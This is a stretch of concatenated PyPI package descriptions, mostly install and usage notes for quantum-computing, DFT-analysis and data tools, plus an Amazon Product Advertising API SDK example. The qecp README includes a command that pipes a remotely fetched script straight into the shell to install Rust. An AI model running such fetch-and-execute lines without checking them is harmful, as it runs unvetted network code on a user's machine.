qdx_py\n\nFUNCTIONS\n concat(conformer_1_contents, conformer_2_contents)\n Takes two conformer json strings and concatenates them\n\n conformer_to_pdb(conformer_contents)\n Returns the pdb string for a qdx conformer json string\n\n formal_charge(conformer_contents, strictness)\n Charges standard amino acids given a conformer json string,\n\n fragment(conformer_contents, backbone_steps, terminal_fragment_sidechain_size=Ellipsis)\n Fragments a conformer, updating the fragment formal charges based on existing atom charges\n\n pdb_to_conformer(pdb_contents, keep_residues=Ellipsis, skip_residues=Ellipsis)\n Converts a pdb string into an array of qdx conformers as a json stringUsageimportqdx_py# get json string of conformerconformer=qdx_py.pdb_to_conformer(open(\"../qdx-common/tests/data/6mj7.pdb\").read())# get pdb of conformerpdb=qdx_py.conformer_to_pdb(conformer)Developing~setupvenv\nmaturindevelop\npython\n~importqdx_pyPublishingexportMATURIN_PYPI_TOKEN=[yourtoken]maturinpublish--manylinux2_28--zig-f"} +{"package": "qdyn", "pacakge-description": "QDYN Python PackageQDYN-pylib is a Python packageqdynfor interacting with theFortran QDYN library and tools. Its purpose is to:generate config files and input data for QDYNread data generated by QDYN routinesprovide tools for debugging, testing, and documenting QDYNwrap QDYN's \"utility\" programs likeqdyn_prop_trajandqdyn_optimizeprovide interoperability of QDYN with other optimal control and quantum packages likescipy.optimize,QuTiPand theKrotov Python Package.The package isnota direct wrapper around QDYN that would allow to call QDYN Fortran routines from Python.InstallationTo install the latest released version of QDYN-pylib, run this command in your terminal:pip install qdynThis is the preferred method to install QDYN-pylib, as it will always install the most recent stable release.If you are a QDYN developer, you can install the latest development version of QDYN-pylib with the following command:pip install git+git@gitlabph.physik.fu-berlin.de:ag-koch/qdyn.git@main#egg=qdyn&subdirectory=qdynpylib"} +{"package": "qe", "pacakge-description": "No description available on PyPI."} +{"package": "qe-analyzer", "pacakge-description": "qe_analyzer\nconvergenceTests.py\n[ecut, planewaves, energy, ecut**(3/2)]=extractECUTConvergenceInfo(file1)\n\"head_ECUTcovergencePlot.png\"=ECUTconvergenceTest(head, calcThresh=False, thresh=0.05)\n\"TotEvsInequivK.png\"=KconvergenceTest(fmt='*.out')\nkx, ky, kz, shiftx, khifty, shiftz, ecutwfc, energy, inequiv, time=extractKConvergenceInfo(file1)\na, cba, totEnergy=importacLatticeParamEnergyFile(fname)\nmat, unA, unCbA, data=importAllLatParamFiles(fmt)\n\"print(min data point a=, c/a=)\"=plotCbAvsA(fmt, lim=0)\ncopyPaste.py\n\"updated file\"=insertKptsFromXcrysden(kpfFile, updateFile)\n\"output file and lines in console describing what is being replaced to allow for verification\"=vcRelaxTransfer(inFileHead, outputF)\nelectronBands.py\n[Ef, booleanHighestOccupied]=getEfSCF(scfFile)\n[k, energies]=importBands(file)\n[k, energies, xCoordinates, highSymmetryPoints]=buildBands(file2)\nplotBands(file, Ef=0, Kcoord=True, lbls=[], figsize=plt.rcParams.get('figure.figsize'), pad=1.08)\nphonons.py\nx, energy=importFreqGp(fname)\npts, flfrq=generateXcoordMatdyn(matdynFile)\nplotPhononDispersion_cm(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[])\nplotPhononDispersion_meV(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[])convergenceTests.extractECUTConvergenceInfo(file1):\n\"\"\"extracts ECUT convergence information from a given file, file1\noutputs a list of [ECUT, # planewaves, energy, CPU time, and ECUT**(3/2)]Parameters\n----------\nfile1 : str\n DESCRIPTION. File to read in\n\nReturns list containing\n-------\necutwfc : float\n DESCRIPTION. ECUT value \nplanewaves : float\n DESCRIPTION. number of planewaves\nenergy : float\n DESCRIPTION. Total Energy\ntime: float\n\tDESCRIPTION. CPU time\necutwfc**(3/2): float\n\tDESCRIPTION. ECUT value to the 2/3 power. Ecut**(2/3) should be proportional to the number of planewaves\n\n\"\"\"convergenceTests.ECUTconvergenceTest(head, calcThresh=False, thresh=0.05)\n\"\"\" Prints the filenames imported for an ECUT convergence test (series of files where ECUT is changing)\nassumes '${head}-${ECUT}.out' file naming,\nwill ignore all other files in folder.\nPrints the filenames that it imports for this also saves the plotParameters\n----------\nhead : str\n DESCRIPTION. The header to the filename. Assumes that your working directory contains files with \n\t '${head}-${ECUT}.out' formatting\ncalcThresh : boolean, optional\n\tDESCRIPTION. Do you want to pull out the ECUT associated with a convergence threshold?\n\nthresh : float\n\tDESCRIPTION. The convergence threshold you would like\nReturns\n-------\nNone. A plot should show up and will be automatically saved to your working directory.\n\"\"\"convergenceTests.extractKConvergenceInfo(file1)\n\"\"\"\nkx, ky, kz, shiftx, shifty, shiftx, ecutwfc, energy, inequiv,time =extractKConvergenceInfo('SrTiO3-260-0-16.out')Parameters\n----------\nfile1 : str\n DESCRIPTION. name of *.out file to extract information from\n\nReturns\n-------\nkx : int\n DESCRIPTION.# k points in x direction\nky : int\n DESCRIPTION. # k points in y direction\nkz : int\n DESCRIPTION. # k points in z direction\nshiftx : int\n DESCRIPTION.0 or 1\nshifty : int\n DESCRIPTION.0 or 1\nshiftz : int\n DESCRIPTION.0 or 1\necutwfc : float\n DESCRIPTION. cutoff energy\nenergy : float\n DESCRIPTION. total energy\ninequiv : int\n DESCRIPTION. Number inequivalent k points\ntime : float\n DESCRIPTION. CPU time in minutes\n\n\"\"\"convergenceTests.KconvergenceTest(fmt='.out')\n\"\"\"\nplots energy vs # k point mesh in x, y, and z directions. If all equal, only does one plot\nKconvergenceTest('SrTiO3-260--*.out')Parameters\n----------\nfmt : string, optional\n DESCRIPTION. The default is '*.out'. filename format for searching the working directory. This is like glob\n\nReturns\n-------\nNone.\n\"\"\"convergenceTests.importacLatticeParamEnergyFile(fname)\n'''Parameters\n----------\nfname : TYPE\n DESCRIPTION.\n\nReturns\n-------\na : float\n DESCRIPTION. lattice constant a in Bohr\ncba : float\n DESCRIPTION.c/a ratio\ntotEnergy : float\n DESCRIPTION. total energy in Ry\n\n'''convergenceTests.importAllLatParamFiles(fmt)\n\"\"\"\nimport all lattice parameter files. Use this for debugging any issues with plotCbAvsA. This is used in plotCbAvsA.\nPrints the filenames of all files imported to allow you to check that things import properly\nParameters\n----------\nfmt : str\nDESCRIPTION. Format used by glob to describe the files involved in the lattice parameter dataReturns\n-------\nmat : numpy array of floats\n DESCRIPTION. Array of total energies\nunA : 1-d sorted numpy array\n DESCRIPTION. Array of unique values in the a-lattice parameter\nunCbA : 1-d sorted numpy array\n DESCRIPTION. Array of unique values in c/a\ndata : numpy array\n DESCRIPTION. raw data extracted from files, useful for debugging\n\n\"\"\"convergenceTests.plotCbAvsA(fmt, lim=0):\n\"\"\"\nPlots C/A vs A when A is in Bohr\nfmt='graphite__.out'plotCbAvsA(fmt)Parameters\n----------\nfmt : str\nDESCRIPTION. Format used by glob to describe the files involved in the lattice parameter data\nlim : float, optional\nDESCRIPTION. The default is -45.599. Describes the energy threshold above which all become one color.Returns\n-------\nNone.\n\n\"\"\"copyPaste.insertKptsFromXcrysden(kpfFile, updateFile):\n\"\"\"\nGenerates a new *.in file entitled updateFile(minus.in)_update.in\nby incorporating the k-points listed in kpfFile\n(real form of k-point coordinates)Parameters\n----------\nkpfFile : str\n DESCRIPTION. Filename, including extension, of the XCRYSDEN *.kpf file \n containing the points you want to add\nupdateFile : TYPE\n DESCRIPTION. Filename, including extension, of the *.in file that you \n want to update/replace k-points of. This should leave other blocks alone.\n\nReturns\n-------\nNone.\n\n\"\"\"copyPaste.vcRelaxTransfer(inFileHead, outputF):\n'''\nApplies the new lattice parameters and atom sites obtained from a vc-relax calculation to a new *.in file\nexample: vcRelaxTransfer('Si-vcRelax', 'Si-vcRelax2.in')\nCaution: Not fully tested.Parameters\n----------\ninFileHead : str\n DESCRIPTION. Head of pw.x input and output files used for vc-relax calculation ([HEAD].in and [HEAD].out). No extension included\noutputF : str\n DESCRIPTION. Name of the new pw.x input file that you want to create. MUST INCLUDE *.in EXTENSION!\n\nReturns\n-------\nNone.\n\n'''electronBands.getEfSCF(scfFile):\n\"\"\" Extracts Fermi level from SCF fileParameters\n----------\nscfFile : str\n DESCRIPTION. Filename (or path to file and filename)\n\nReturns\n-------\nlist\n DESCRIPTION. [Ef, highest occupied], The first element is the Fermi level. \n The second element is a boolean describing whether the file said it was \n the highest occupied orbital (True) or truly the Fermi level (False) \n\n\"\"\"electronBands.importBands(file):\n\"\"\" import bands structure in a mannner ready for plotting\nParameters\n----------\nfile : str\nDESCRIPTION. band.x output file $[prefix]_bandx.out file generated by running bands.x\nKcoord : boolean, optionalReturns\n-------\nk : array of float64\n DESCRIPTION. x-coordinates associated with k-points to use for plot. This is a 1-d array (vector)\nEnergies : array of float64\n DESCRIPTION. array such that each column represents a band\nx2 : list\n DESCRIPTION. x-coordinates associated with special k points\nhsp : list\n DESCRIPTION. Each element in the list is a set of coordinates [kx, ky, kz] \n describing the high-symmetry points. \n\"\"\"electronBands.buildBands(file2):\n\"\"\"Extracts energy vs k for plotting into 1D array k and numpy array;\nalso extracts special points for plottingParameters\n----------\nfile2 : str\n DESCRIPTION. band.x output file $[prefix]_bandx.out file generated by running bands.x\nKcoord : boolean, optional\n\nReturns\n-------\nk : array of float64\n DESCRIPTION. x-coordinates associated with k-points to use for plot. This is a 1-d array (vector)\nEnergies : array of float64\n DESCRIPTION. array such that each column represents a band\nx2 : list\n DESCRIPTION. x-coordinates associated with special k points\nhsp : list\n DESCRIPTION. Each element in the list is a set of coordinates [kx, ky, kz] \n describing the high-symmetry points. \n\n\"\"\"electronBands.plotBands(file, Ef=0, Kcoord=True, lbls=[], figsize=plt.rcParams.get('figure.figsize'), pad=1.08):\n\"\"\" Return a plot of the data from file.\nplotBands(file)\nplotBands(file, getEfSCF('si_scf.out')[0], False, ['L', r'$\\Gamma$', 'X'])\nplotBands(file, 0, False, ['L', r'$\\Gamma$', 'X'])Parameters\n----------\nfile : str\n DESCRIPTION. band.x output file $[prefix]_bandx.out file generated by running bands.x\nEf : float, optional\n DESCRIPTION. Fermi level. Can be extracted using \nKcoord : boolean, optional\n DESCRIPTION. The default is True. For the k-axis, use the special point coordinates (kx, ky, kz) for labels. \n If false, requires lbls to include a list of labels of the appropriate length eg:['L', r'$\\Gamma$', X]\nlbls : list\n DESCRIPTION. The default is []. List of length number of high-symmetry points, optional only if Kcoord=True. \nfigsize: (float, float), optional\n DESCRIPTION. The default is plt.rcParams.get('figure.figsize'). Figure width and height in inches\npad: float, optional\n DESCRIPTION. The default is 1.08. Padding around figure for tight_layout\nReturns\n-------\nNone.\n\n\"\"\"phonons.importFreqGp(fname)\n\"\"\"\nimports data from *.freq.gp fileParameters\n----------\nfname : str\n DESCRIPTION.file name to be imported\n\nReturns\n-------\nx: 1-d numpy array\n DESCRIPTION. k point x-value for plotting (2pi/a)\nenergy: 2-d numpy array\n DESCRIPTION. each column is a different band.phonons.generateXcoordMatdyn(matdynFile)\n\"\"\"\ngenerates X-labels (special K-points) from matdyn file\nassumes q_in_band_form=TrueParameters\n----------\nmatdynFile : TYPE\n DESCRIPTION.\n\nReturns\n-------\npts : 2-d numpy array\n DESCRIPTION. special points such that column 0 is kx, column 1 is ky, column 2 is kz, column 3 is the x-coordinate for the E-vs-k plot\nflfrq : str\n DESCRIPTION. filename from matdyn file for where to expect the phonon data for processing (*.freq.gp file)\n\n\"\"\"phonons.plotPhononDispersion_cm(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[]):\n\"\"\"\nPlots phonon dispersion assuming q_in_band_form for special pointsplotPhononDispersion_cm('diamond_matdyn.in')\nplotPhononDispersion_cm('diamond_matdyn.in', labels=['L', r'$\\Gamma$', 'X'])\n\nParameters\n----------\nmatdynF : str\n DESCRIPTION. Filename of the matdyne input file that you used to generate the *.freq.gp file\nfigsize : tuple, optional\n DESCRIPTION. The default is plt.rcParams.get('figure.figsize'). See matplotlib.pyplot.plot for details\npad : float, optional\n DESCRIPTION. The default is 1.08. padding around the figure in plt.tight_layout()\nlabels : list of strings, optional\n DESCRIPTION. The default is []. Labels to use for the special points. \n If the length of this is not equal to the number of special points listed in matdynF, these labels will not be used.\n assumes q_in_band_form\n\nReturns\n-------\nNone.\n\n\"\"\"phonons.plotPhononDispersion_meV(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[])\n\"\"\"\nPlots phonon dispersion assuming q_in_band_form for special pointsplotPhononDispersion_meV('diamond_matdyn.in')\nplotPhononDispersion_meV('diamond_matdyn.in', labels=['L', r'$\\Gamma$', 'X'])\n\n\nParameters\n----------\nmatdynF : str\n DESCRIPTION. Filename of the matdyne input file that you used to generate the *.freq.gp file\nfigsize : tuple, optional\n DESCRIPTION. The default is plt.rcParams.get('figure.figsize'). See matplotlib.pyplot.plot for details\npad : float, optional\n DESCRIPTION. The default is 1.08. padding around the figure in plt.tight_layout()\nlabels : list of strings, optional\n DESCRIPTION. The default is []. Labels to use for the special points. \n If the length of this is not equal to the number of special points listed in matdynF, these labels will not be used.\n assumes q_in_band_form\n\nReturns\n-------\nNone.\n\n\"\"\""} +{"package": "qeapp-xps", "pacakge-description": "Welcome to QEapp XPS plugin!A plugin for calculating X-ray Photoelectron Spectroscopy (XPS) spectra using theXpsWorkChainof aiida-quantumespresso package.Setting PanelThe Setting panel allows users toselect the peak (element and orbital) to be calculated. The availability of peak in the panel depends on the corresponding pseudopotentials.adjust the parameters based on the input structure.Results PanelThe Result panel displays the final XPS spectrum.broadened spectrum using a Voight profile (combined Lorenzian and Gaussian)the chemical shift values (differences in total energy relative to the lowest value)absolute binding energyPseudopotentials\nXPS calculations in QE require core-hole pseudopotentials. We supply a set of pseudopotentials specific to XPS calculations in theXPS Pseudopotential Repository. This repository provides the core-hole pseudopotentials as an AiiDA archive file. There are two kind of pseudopotentials available:pbepbesolWorkChainTo make the setting as simple as possible for user. The following default setting are used.core_hole_treatment.fullfor moleculexch_smearfor metalxch_fixedfor insulatorsupercell_min_parameterupdated based onprotocol."} +{"package": "qec", "pacakge-description": "QEC: Python Tools for Quantum Error CorrectionInstallationThis repo requires the development verison of ldpc for thegf2sparsemodule. Install from (https://github.com/quantumgizmos/ldpc2).The qec package can then be installed using pip.pip install -e ."} +{"package": "qecalc", "pacakge-description": "UNKNOWN"} +{"package": "qeclab", "pacakge-description": "No description available on PyPI."} +{"package": "qecore", "pacakge-description": "## qecore[![Build Status](https://img.shields.io/gitlab/pipeline/dogtail/qecore)](https://gitlab.com/dogtail/qecore/-/pipelines) [![PyPI Version](https://img.shields.io/pypi/v/qecore)](https://pypi.org/project/qecore/)The future goal for qecore is for it to become project template for automation testing.\nAs of now the qecore provides a lot of quality of life features for GNOME Desktop testing.It can be described as a sandbox of sorts for test execution.\nPaired with behave and dogtail this project serves as a useful tool for test execution with minimal required setup.[Project Documentation in gitlab Pages](https://dogtail.gitlab.io/qecore/index.html) - build by CI pipelines on every change### Execute unit testsExecute the tests (from the project root directory) on machine with dogtail:`bash rm-f/tmp/qecore_version_status.txt rm-fdist/*.whlpython3-mbuild python3-mpip install--force-reinstall--upgradedist/qecore*.whlsudo-utestscripts/qecore-headless\"behave-fhtml-pretty-o/tmp/report_qecore.html-fplain tests/features\" `You can use-f prettyinstead of-f plainto get colored output.The standard output should not contain any python traceback, produced HTML should be complete (after first scenario there isStatus)."} +{"package": "qecp", "pacakge-description": "QEC-PlaygroundA research tool to explore Quantum Error Correction (QEC), primarily surface codes.[Error] we're working on the documentation of this project, please wait for a formal release (1.0.0) before you want to use this project.InstallationSee theQEC-Playground Documentation: Installationfor the detailed instructions.\nA brief example is below.# Download the Blossom V Library [Optional]wget-chttps://pub.ist.ac.at/~vnk/software/blossom5-v2.05.src.tar.gz-O-|tar-xz\ncp-rblossom5-v2.05.src/*backend/blossomV/\nrm-rblossom5-v2.05.src# Install the Python Dependencies [Optional]sudoaptinstallpython3python3-pip\npip3installnetworkx# Install the Rust Toolchaincurl--proto'=https'--tlsv1.2-sSfhttps://sh.rustup.rs|shsource~/.bashrc# this will add `~/.cargo/bin` to pathcdbackend/rust/\ncargobuild--releasecd../../Command-line InterfaceSee theQEC-Playground Documentation: CLIfor the detailed instructions.\nA brief example use case is below.Runcargo run --release -- --helpunderbackend/rust/folder to get all provided commands of backend program.\nThe option--helpprints out the information of this command, which can be helpful to find subcommands as well as to understand the purpose of each option.\nAn example output is below.QECPlayground 0.1.6\nYue Wu , Namitha Liyanage (namitha.liyanage@yale.edu)\nQuantum Error Correction Playground\n\nUSAGE:\n qecp \n\nOPTIONS:\n -h, --help Print help information\n -V, --version Print version information\n\nSUBCOMMANDS:\n fpga_generator fpga_generator\n help Print this message or the help of the given subcommand(s)\n server HTTP server for decoding information\n test testing features\n tool toolsTo run a simulation to benchmark the logical error rate of decoder, runcargo run --release -- tool benchmark --help. An example output is below.qecp-tool-benchmark0.1.6\nbenchmarksurfacecodedecoders\n\nUSAGE:qecptoolbenchmark[OPTIONS]\n\nARGS:[di1,di2,di3,...,din]codedistanceofverticalaxis[nm1,nm2,nm3,...,nmn]numberofnoisymeasurementrounds,musthaveexactlythesamelengthas`dis`;notethataperfectmeasurementisalwayscappedattheend,sotosimulateasingleroundofperfectmeasurementyoushouldsetthisto0[p1,p2,p3,...,pm]p=px+py+pzunlessnoisemodelhasspecialinterpretationofthisvalue\n\nOPTIONS:--bias_etabias_eta=pz/(px+py)andpx=py,px+py+pz=p.defaultto1/2,whichmeanspx=pz=py[default:0.5]......For example, to test code-distance-3 standard CSS surface code with depolarizing physical error rates 3%, 2% and 1% only on data qubits (i.e. perfect stabilizer measurements) using the default decoder (MWPM decoder), run:cargorun--release--toolbenchmark[3][0][3e-2,2e-2,1e-2]An example result is below.format:

\n0.03 3 0 567712 10000 0.01761456513161603 3 1.9e-2 0\n0.02 3 0 1255440 10000 0.007965334862677627 3 2.0e-2 0\n0.01 3 0 4705331 10000 0.002125248999485902 3 2.0e-2 0Change LogSeeCHANGELOG.mdContributionsYue Wu (yue.wu@yale.edu): implement 3D GUI. design and implement interactive tutorial. propose and implement na\u00efve decoder. implement MWPM decoder. Implement different variants of surface code and different decoders (see change log 2020.11.8 - 2022.3.20). The major developer and maintainer of this repository.Guojun Chen: collaborator of CPSC 559 course project: design GUI. design and implement machine learning based weight optimized MWPM decoder.Namitha Godawatte Liyanage: implement approximate MWPM decoder and FPGA related functionalities.Neil He: bind library to Python.AttributionWhen using QEC-Playground for research, please cite:TODO: arXiv link for related papers (probably the fusion blossom paper)"} +{"package": "qecsim", "pacakge-description": "qecsimis a Python 3 package for simulating quantum error correction using\nstabilizer codes.It provides access to all features via a command-line interface. It can also be\nused as a library via the fully-documented API. It includes many common codes,\nerror models and decoders, and can be extended with additional components.InstallationInstall and upgrade usingpip:$ pip install -U qecsimUsageCLI$ qecsim --version\nqecsim, version 1.0b9\n$ qecsim --help # console script\n...\n$ python -O -m qecsim --help # module script with Python options e.g. -O for optimize\n...API>>> import qecsim\n>>> qecsim.__version__\n'1.0b9'\n>>> from qecsim import app\n>>> help(app)\n...Extensionqecsim can be extended with additional codes, error models and decoders that\nintegrate into the command-line interface.\nSeehttps://github.com/qecsim/qecsimextfor a basic example.License / Citingqecsim is released under the BSD 3-Clause license. If you use qecsim in your\nresearch, please see theqecsim documentationfor citing details.LinksSource code:https://github.com/qecsim/qecsimDocumentation:https://qecsim.github.io/Issue tracker:https://github.com/qecsim/qecsim/issuesReleases:https://pypi.org/project/qecsim/Contact:qecsim@gmail.comCopyright 2016 - 2021, David K. Tuckett."} +{"package": "qecstruct", "pacakge-description": "No description available on PyPI."} +{"package": "qed", "pacakge-description": "No description available on PyPI."} +{"package": "qedit", "pacakge-description": "QEditA CLI for automatically editing videos using word detection.Recognizes words using the Vosken-us-smmodelIntelligently cuts out silence from the video"} +{"package": "qeds", "pacakge-description": "This package provides a simplified interface to datasets that we use\nfrequently.Loading dataTo see a list of available datasets runimportqedsqeds.data.available()To load one of the listed datasets rundf=qeds.data.load(\"dataset_name\")wheredataset_nameis replaced by one of the names returned byqeds.data.available().When you first load a dataset, qeds will fetch the data from\nsomewhere online. It will then save a local copy of the data to your\nhard drive. Subsequent requests to load a dataset (even in different\npython sessions) will first attempt to load the data from your hard\ndrive and only fetch from online if necessary.ConfigurationThe qeds library is configurable. Below is a listing of available\nconfiguration options.To see a list of valid configuration options runimportqedsqeds.data.config.describe_options()To set a configuration usevalourm.data.options[section.option] = value.For example, to set the configuration option for the BLS api_key I would\ncall:importqedsqeds.data.options[\"bls.api_key\"]=\"MY_API_KEY\"Developer docsContributing datasetsTo contribute a dataset you need to implement a function_retrieve_{name}inside the filedata/retrieve.py. This function\nis responsible for obtaining the data either \u201cby hand\u201d (data hard coded\ninto the function) or from online. The function must return a pandas\nDataFrame with the data."} +{"package": "qed-seal", "pacakge-description": "No description available on PyPI."} +{"package": "qedward", "pacakge-description": "Quantum EdwardInstallationYou can install Quantum Edward from the Python package managerpipusing:pip install qedward --userQuantum Edward at this point is just a small library of Python tools for\ndoing classical supervised learning on Quantum Neural Networks (QNNs).An analytical model of the QNN is entered as input into QEdward and the training\nis done on a classical computer, using training data already available (e.g.,\nMNIST), and using the famous BBVI (Black Box Variational Inference) method\ndescribed in Reference 1 below.The input analytical model of the QNN is given as a sequence of gate\noperations for a gate model quantum computer. The hidden variables are\nangles by which the qubits are rotated. The observed variables are the input\nand output of the quantum circuit. Since it is already expressed in the qc's\nnative language, once the QNN has been trained using QEdward, it can be\nrun immediately on a physical gate model qc such as the ones that IBM and\nGoogle have already built. By running the QNN on a qc and doing\nclassification with it, we can compare the performance in classification\ntasks of QNNs and classical artificial neural nets (ANNs).Other workers have proposed training a QNN on an actual physical qc. But\ncurrent qc's are still fairly quantum noisy. Training an analytical QNN on a\nclassical computer might yield better results than training it on a qc\nbecause in the first strategy, the qc's quantum noise does not degrade the\ntraining.The BBVI method is a mainstay of the \"Edward\" software library. Edward uses\nGoogle's TensorFlow lib to implement various inference methods (Monte Carlo\nand Variational ones) for Classical Bayesian Networks and for Hierarchical\nModels. H.M.s (pioneered by Andrew Gelman) are a subset of C.B. nets\n(pioneered by Judea Pearl). Edward is now officially a part of TensorFlow,\nand the original author of Edward, Dustin Tran, now works for Google. Before\nEdward came along, TensorFlow could only do networks with deterministic\nnodes. With the addition of Edward, TensorFlow now can do nets with both\ndeterministic and non-deterministic (probabilistic) nodes.This first baby-step lib does not do distributed computing. The hope is that\nit can be used as a kindergarten to learn about these techniques, and that\nthen the lessons learned can be used to write a library that does the same\nthing, classical supervised learning on QNNs, but in a distributed fashion\nusing Edward/TensorFlow on the cloud.The first version of Quantum Edward analyzes two QNN models called NbTrols\nand NoNbTrols. These two models were chosen because they are interesting to\nthe author, but the author attempted to make the library general enough so\nthat it can accommodate other akin models in the future. The allowable\nmodels are referred to as QNNs because they consist of 'layers',\nas do classical ANNs (Artificial Neural Nets). TensorFlow can analyze\nlayered models (e.g., ANN) or more general DAG (directed acyclic graph)\nmodels (e.g., Bayesian networks).This software is distributed under the MIT License.ReferencesR. Ranganath, S. Gerrish, D. M. Blei, \"Black Box Variational\nInference\",https://arxiv.org/abs/1401.0118https://en.wikipedia.org/wiki/Stochastic_approximationdiscusses Robbins-Monro conditionshttps://github.com/keyonvafa/logistic-reg-bbvi-blog/blob/master/log_reg_bbvi.pyhttp://edwardlib.org/https://discourse.edwardlib.org/"} +{"package": "qef", "pacakge-description": "qefquasielastic fittingFree software: MIT licenseDocumentation:https://qef.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.2.3 (2018-04-10)Include only qef directory in release0.2.2 (2018-04-10)Exclude tests directory from release0.2.1 (2018-04-10)Include subdirectories of qef in release0.2.0 (2018-04-09)Notebook for global fitting (PR #40)Load Mantid Nexus data (PR #38)Tabulated resolution model (PR #43)0.1.0 (2017-12-13)First release on PyPI."} +{"package": "qeGraphMaker", "pacakge-description": "No description available on PyPI."} +{"package": "qegueqrgobufqjke", "pacakge-description": "No description available on PyPI."} +{"package": "qeh", "pacakge-description": "Quantum Electrostatic Heterostructure ModelThe quantum electrostatic heterostructure (QEH) model is a\nfast and accurate model for simulating optical properties\nof stacks of 2D materials (heterostructures).Documentation:https://qeh.readthedocs.ioCode:https://gitlab.com/camd/qeh.git"} +{"package": "qeijo", "pacakge-description": "First of all,qeijois not an acronym. Okay, we have the Q and E for Quantum Espresso, for sure, but that's it.\nThe point was just to use a funny name for the package.qeijois an incorrect way - on purpose, of course - of spelling \"queijo\", which is simply the Portuguese word\nfor \"cheese\".This package contains a lightweight library that allows the user to launch electronic structure calculations with\nQuantum Espresso and then collect the results, all done in a Pythonic way. Just to be clear, I don't\nclaim that this package can compete in terms of features with much larger frameworks for atomistic\nsimulations, like ASE. All you can expect fromqeijois that it is light and easy to use.In version 0.1, there is only one module,pw, which must be used to build an input to the pw.x program,\nlaunch a total energy calculation and get from it important quantities, like the total energy of the\nsystem, the relaxed atomic coordinates, magnetization, etc. In future releases, I plan to add interfaces\nto other programs from the Quantum Espresso package, as well as work a bit more on user documentation.Basic Usage Example# Launching a calculation with pw.x of H2 molecule, reading the input from an existing input file\nfrom qeijo import pw\n\ncmd=\"mpirun -np 2 pw.x\"\nh2_calc=pw.calc()\nh2_calc.read_input(\"h2.inp\")\ninpstr=h2_calc.build_input()\nh2_out=h2_calc.run(command_line=cmd,input_string=inpstr,saveout=True,\n outfile=\"h2.out\",savecoords=True,coordfile=\"h2.xyz\")\n\n# Print the total energy in eV\nprint(\"Total energy: %f\" % h2_out.energy[-1])\n\n# Print the relaxed coordinates of the the two H atoms\nprint(\"H1: %f %f %f\" % (h2_out.x[0],h2_out.y[0],h2_out.z[0]))\nprint(\"H2: %f %f %f\" % (h2_out.x[1],h2_out.y[1],h2_out.z[1]))"} +{"package": "qempo-paapi5-python-sdk", "pacakge-description": "Product Advertising API 5.0 SDK for PythonThis repository contains the official Product Advertising API 5.0 Python SDK calledpaapi5-python-sdkthat allows you to access theProduct Advertising APIfrom your Python app.RequirementsPython 2.7 and 3.4+Installation & Usagepip installYou can directly install it from pip using:pipinstallpaapi5-python-sdkOr, you may also install directly from Githubpipinstallgit+https://github.com/amzn/paapi5-python-sdk.git(you may need to runpipwith root permission:sudo pip install git+https://github.com/amzn/paapi5-python-sdk.git)Then import the package:importpaapi5_python_sdkSetuptoolsInstall viaSetuptools.pythonsetup.pyinstall--user(orsudo python setup.py installto install the package for all users)Then import the package:importpaapi5_python_sdkGetting StartedPlease follow theinstallation procedureand then run the following:Simple example forSearchItemsto discover Amazon products with the keyword 'Harry Potter' in Books category:frompaapi5_python_sdk.api.default_apiimportDefaultApifrompaapi5_python_sdk.models.partner_typeimportPartnerTypefrompaapi5_python_sdk.restimportApiExceptionfrompaapi5_python_sdk.models.search_items_requestimportSearchItemsRequestfrompaapi5_python_sdk.models.search_items_resourceimportSearchItemsResourcedefsearch_items():\"\"\" Following are your credentials \"\"\"\"\"\" Please add your access key here \"\"\"access_key=\"\"\"\"\" Please add your secret key here \"\"\"secret_key=\"\"\"\"\" Please add your partner tag (store/tracking id) here \"\"\"partner_tag=\"\"\"\"\" PAAPI host and region to which you want to send request \"\"\"\"\"\" For more details refer: https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region\"\"\"host=\"webservices.amazon.com\"region=\"us-east-1\"\"\"\" API declaration \"\"\"default_api=DefaultApi(access_key=access_key,secret_key=secret_key,host=host,region=region)\"\"\" Request initialization\"\"\"\"\"\" Specify keywords \"\"\"keywords=\"Harry Potter\"\"\"\" Specify the category in which search request is to be made \"\"\"\"\"\" For more details, refer: https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html \"\"\"search_index=\"Books\"\"\"\" Specify item count to be returned in search result \"\"\"item_count=1\"\"\" Choose resources you want from SearchItemsResource enum \"\"\"\"\"\" For more details, refer: https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter \"\"\"search_items_resource=[SearchItemsResource.ITEMINFO_TITLE,SearchItemsResource.OFFERS_LISTINGS_PRICE,]\"\"\" Forming request \"\"\"try:search_items_request=SearchItemsRequest(partner_tag=partner_tag,partner_type=PartnerType.ASSOCIATES,keywords=keywords,search_index=search_index,item_count=item_count,resources=search_items_resource,)exceptValueErrorasexception:print(\"Error in forming SearchItemsRequest: \",exception)returntry:\"\"\" Sending request \"\"\"response=default_api.search_items(search_items_request)print(\"API called Successfully\")print(\"Complete Response:\",response)\"\"\" Parse response \"\"\"ifresponse.search_resultisnotNone:print(\"Printing first item information in SearchResult:\")item_0=response.search_result.items[0]ifitem_0isnotNone:ifitem_0.asinisnotNone:print(\"ASIN: \",item_0.asin)ifitem_0.detail_page_urlisnotNone:print(\"DetailPageURL: \",item_0.detail_page_url)if(item_0.item_infoisnotNoneanditem_0.item_info.titleisnotNoneanditem_0.item_info.title.display_valueisnotNone):print(\"Title: \",item_0.item_info.title.display_value)if(item_0.offersisnotNoneanditem_0.offers.listingsisnotNoneanditem_0.offers.listings[0].priceisnotNoneanditem_0.offers.listings[0].price.display_amountisnotNone):print(\"Buying Price: \",item_0.offers.listings[0].price.display_amount)ifresponse.errorsisnotNone:print(\"\\nPrinting Errors:\\nPrinting First Error Object from list of Errors\")print(\"Error code\",response.errors[0].code)print(\"Error message\",response.errors[0].message)exceptApiExceptionasexception:print(\"Error calling PA-API 5.0!\")print(\"Status code:\",exception.status)print(\"Errors :\",exception.body)print(\"Request ID:\",exception.headers[\"x-amzn-RequestId\"])exceptTypeErrorasexception:print(\"TypeError :\",exception)exceptValueErrorasexception:print(\"ValueError :\",exception)exceptExceptionasexception:print(\"Exception :\",exception)search_items()Complete documentation, installation instructions, and examples are availablehere.LicenseThis SDK is distributed under theApache License, Version 2.0, see LICENSE.txt and NOTICE.txt for 